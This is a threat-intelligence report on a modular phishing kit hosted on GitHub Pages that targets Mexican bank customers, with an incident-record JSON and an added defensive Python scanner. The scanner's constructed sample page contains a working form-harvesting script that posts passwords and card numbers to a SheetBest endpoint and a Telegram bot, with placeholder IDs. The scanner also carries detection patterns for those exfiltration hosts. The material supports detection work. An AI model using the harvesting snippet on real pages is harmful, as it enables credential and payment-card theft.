GitHub: Modular Phishing Kit Uses GitHub Pages to Steal Payment Card Details and Passwords

Sophisticated Phishing Campaign Exploits GitHub Pages to Target Mexican Banking Customers

A long-running phishing operation has evolved into a serverless, modular campaign leveraging GitHub Pages to steal payment card data, credentials, and customer identifiers from banking users in Mexico. The attack employs a phishing kit with a selector panel, allowing operators to generate institution-specific landing pages impersonating at least a dozen financial institutions. These pages support both desktop and mobile interfaces to maximize victim engagement.

Instead of relying on a single domain, the attackers deployed the kit across more than 100 GitHub Pages repositories, varying the directory paths (e.g., /cancelacion/, /soporte/, /mb1/) for redundancy, takedown evasion, and rapid redeployment. Group-IB researchers attribute the campaign's persistence and scale to a reusable phishing kit that combines GitHub Pages hosting, obfuscated client-side scripts, and third-party APIs, particularly SheetBest, for data exfiltration.

The attack follows a multi-stage flow: victims are first lured to impersonation pages designed to build trust, then redirected to credential-harvesting forms that mimic legitimate banking logins. A JavaScript submit listener intercepts the form submission, serializes the fields into JSON, and POSTs it to a SheetBest API endpoint, which writes the record into an attacker-controlled Google Sheet in real time. Because the victim's browser talks directly to a legitimate SaaS API, the operators need no collection server of their own: there is no custom domain or command-and-control host to block, sinkhole, or seize.

To evade detection, the phishing pages load obfuscated external JavaScript from randomized paths, so the payload can be rotated without changing the visible page. Some instances also embedded hardcoded Telegram bot tokens and chat IDs to forward stolen credentials instantly. Because those tokens ship in client-side JavaScript, anyone who views the page source can read them, which also makes them useful pivot indicators for tracking the operators across repositories. Repository metadata and commit histories show active maintenance by multiple operator accounts over more than a year, with continuous updates, template revisions, and endpoint rotations.

The campaign used Jekyll-based GitHub Pages builds and GitHub Actions for automation, while Open Graph metadata produced convincing link previews in messaging apps. A robots meta tag set to noindex,nofollow shows the pages were never meant to be found through organic search; they were distributed directly via SMS, WhatsApp, Telegram, or social media, where a rich link preview significantly boosts click-through rates.
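The indicators described in the three paragraphs above (a submit listener that POSTs JSON to SheetBest, hardcoded Telegram bot tokens, externally loaded scripts on randomized paths, credential and card fields, a robots noindex,nofollow tag, and Open Graph preview tags) are all visible in static page content, so a defender triaging a reported GitHub Pages URL can score them without executing anything. The following Python script is an added example written for this page; it is not code from Group-IB, from the kit, or from the gbhackers article. The SAMPLE_HTML page, the placeholder SheetBest sheet ID, the placeholder bot token, the scoring weights, and the Spanish field-name heuristics are all constructed assumptions for illustration.

```python
"""Static triage of a suspected kit page for the indicators described above:
submit-listener exfiltration to SheetBest / Telegram, hardcoded bot tokens,
externally loaded scripts, credential fields, robots noindex and Open Graph tags."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Exfiltration sinks named in the reporting (hostnames only; paths vary per kit).
EXFIL_HOSTS = ("sheetbest.com", "api.telegram.org")
# Telegram bot tokens look like "<numeric bot id>:<35 URL-safe chars>" (assumed format).
TELEGRAM_TOKEN_RE = re.compile(r"(?<![0-9])[0-9]{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
SUBMIT_HOOK_RE = re.compile(r"addEventListener\(\s*['\"]submit['\"]")
# Field-name fragments (English/Spanish) suggesting a password, PIN or card field (heuristic).
CRED_FIELD_RE = re.compile(r"pass|clave|contrase|nip|pin|card|tarjeta|cvv|cvc|cc-", re.I)


class PageScanner(HTMLParser):
    """Collects scripts, meta tags and suspicious inputs from one HTML document."""

    def __init__(self):
        super().__init__()
        self.external_scripts = []   # src values of <script src=...>
        self.inline_js = ""          # concatenated bodies of inline <script> blocks
        self.meta = {}               # meta name/property -> content
        self.credential_fields = []  # inputs that look like credential/card fields
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.external_scripts.append(a["src"])
            else:
                self._in_script = True
        elif tag == "meta":
            key = a.get("name") or a.get("property")
            if key:
                self.meta[key.lower()] = a.get("content") or ""
        elif tag == "input":
            hint = " ".join(v for v in (a.get("type"), a.get("name"), a.get("id"), a.get("autocomplete")) if v)
            if CRED_FIELD_RE.search(hint):
                self.credential_fields.append(a.get("name") or a.get("id") or hint)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_js += data


def _is_exfil_host(url):
    host = urlparse(url).hostname or ""
    return any(host == h or host.endswith("." + h) for h in EXFIL_HOSTS)


def scan(html, fetched_scripts=None):
    """Return the indicators found in `html`. `fetched_scripts` maps script URL -> body for
    external scripts already downloaded, since the kit keeps its exfiltration logic in
    separately loaded, obfuscated files that the HTML alone does not contain."""
    p = PageScanner()
    p.feed(html)
    p.close()
    js = p.inline_js + "\n" + "\n".join((fetched_scripts or {}).values())
    corpus = html + "\n" + js
    robots = p.meta.get("robots", "").replace(" ", "").lower()
    return {
        "exfil_endpoints": sorted({u for u in URL_RE.findall(corpus) if _is_exfil_host(u)}),
        "telegram_tokens": sorted(set(TELEGRAM_TOKEN_RE.findall(corpus))),
        "submit_hook": bool(SUBMIT_HOOK_RE.search(js)),
        "external_scripts": p.external_scripts,
        "credential_fields": p.credential_fields,
        "noindex": "noindex" in robots and "nofollow" in robots,
        "og_preview": any(k.startswith("og:") for k in p.meta),
    }


def score(indicators):
    """Crude weighting (assumed): exfil to a known sink plus credential fields is the core signal."""
    weights = (("exfil_endpoints", 40), ("telegram_tokens", 30), ("submit_hook", 10),
               ("credential_fields", 10), ("noindex", 5), ("og_preview", 5))
    return min(100, sum(w for key, w in weights if indicators[key]))


FAKE_TOKEN = "123456789:" + "A" * 35  # constructed placeholder, not a real bot token

# Constructed sample page modelled on the described kit; not content from the campaign.
SAMPLE_HTML = """<!doctype html>
<html><head>
<meta name="robots" content="noindex, nofollow">
<meta property="og:title" content="Cancelacion de cargo no reconocido">
<meta property="og:image" content="https://example.github.io/cancelacion/img/logo.png">
<script src="/cancelacion/assets/js/a8f3c1.js"></script>
</head><body>
<form id="login">
  <input name="usuario" type="text">
  <input name="clave" type="password">
  <input name="tarjeta" autocomplete="cc-number">
  <button type="submit">Entrar</button>
</form>
<script>
document.getElementById('login').addEventListener('submit', function (e) {
  e.preventDefault();
  var d = Object.fromEntries(new FormData(e.target));
  fetch('https://sheetbest.com/api/sheets/00000000-0000-0000-0000-000000000000',
        {method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify(d)});
  fetch('https://api.telegram.org/bot__TOKEN__/sendMessage?chat_id=1&text=' + encodeURIComponent(JSON.stringify(d)));
});
</script>
</body></html>""".replace("__TOKEN__", FAKE_TOKEN)

if __name__ == "__main__":
    found = scan(SAMPLE_HTML)
    for key, value in found.items():
        print(f"{key}: {value}")
    print("score:", score(found))
```

In real use the external scripts listed under external_scripts must be fetched and passed in as fetched_scripts, because the kit deliberately keeps the exfiltration code out of the HTML; a page that scores low on the HTML alone is not cleared until those files have been inspected. Any bot token the scan turns up should be treated as an indicator to pivot on, not as something to call.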

This operation highlights a growing trend: threat actors abuse trusted cloud platforms, HTTPS, and deployment ease to conduct resilient phishing at scale. By exploiting services like GitHub Pages and SheetBest, attackers minimize infrastructure exposure and complicate attribution and takedown efforts. Group-IB identified numerous GitHub Pages repositories and SheetBest endpoints tied to the campaign, all resolving to a shared backend IP, reinforcing a centralized, serverless exfiltration model.

Source: https://gbhackers.com/modular-phishing-kit-uses-github-pages/

GitHub cybersecurity rating report: https://www.rankiteo.com/company/github

{
  "id": "GIT1781706579",
  "linkid": "github",
  "type": "Cyber Attack",
  "date": "3/2024",
  "severity": "85",
  "impact": "4",
  "explanation": "Attack with significant impact with customers data leaks"
}
{
  "affected_entities": [
    {"industry": "Banking", "location": "Mexico", "type": "Financial Institutions"}
  ],
  "attack_vector": "GitHub Pages, SMS, WhatsApp, Telegram, Social Media",
  "data_breach": {
    "data_exfiltration": "Yes (via SheetBest API to Google Sheets, Telegram bots)",
    "personally_identifiable_information": "Yes",
    "sensitivity_of_data": "High",
    "type_of_data_compromised": ["Payment card data", "Credentials", "Customer identifiers"]
  },
  "description": "A long-running phishing operation has evolved into a serverless, modular campaign leveraging GitHub Pages to steal payment card data, credentials, and customer identifiers from banking users in Mexico. The attack employs a phishing kit with a selector panel, allowing operators to generate institution-specific landing pages impersonating at least a dozen financial institutions. These pages support both desktop and mobile interfaces to maximize victim engagement. The campaign leveraged Jekyll-based GitHub Pages builds and GitHub Actions for automation, while Open Graph metadata ensured convincing link previews for messaging apps. The attack follows a multi-stage flow: victims are lured to impersonation pages designed to build trust before being redirected to credential-harvesting forms mimicking legitimate banking logins. JavaScript submit listeners intercept form submissions, serialize data into JSON, and POST it to SheetBest API endpoints, which populate attacker-controlled Google Sheets in real time.",
  "impact": {
    "brand_reputation_impact": "Likely significant for impersonated banks",
    "data_compromised": "Payment card data, credentials, customer identifiers",
    "identity_theft_risk": "High",
    "payment_information_risk": "High"
  },
  "investigation_status": "Ongoing (Group-IB identified repositories and endpoints)",
  "lessons_learned": "Threat actors are increasingly abusing trusted cloud platforms and serverless architectures to conduct resilient phishing campaigns at scale. The use of GitHub Pages, SheetBest, and Telegram for data exfiltration minimizes infrastructure exposure and complicates takedown efforts.",
  "motivation": "Financial gain, credential theft, payment card data theft",
  "post_incident_analysis": {
    "corrective_actions": "Enhanced monitoring of cloud platforms, customer education, improved phishing detection mechanisms",
    "root_causes": "Abuse of GitHub Pages and SheetBest for serverless phishing, lack of customer awareness, insufficient detection of impersonation pages"
  },
  "recommendations": [
    "Implement multi-factor authentication for all banking logins",
    "Monitor and block suspicious GitHub Pages domains",
    "Educate customers on identifying phishing attempts",
    "Enhance detection of credential-harvesting forms and data exfiltration to third-party APIs",
    "Collaborate with cloud service providers to detect and take down malicious repositories"
  ],
  "references": [{"source": "Group-IB"}],
  "response": {"third_party_assistance": "Group-IB researchers"},
  "title": "Sophisticated Phishing Campaign Exploits GitHub Pages to Target Mexican Banking Customers",
  "type": "Phishing",
  "vulnerability_exploited": "Abuse of trusted cloud platforms (GitHub Pages, SheetBest), lack of multi-factor authentication, social engineering"
}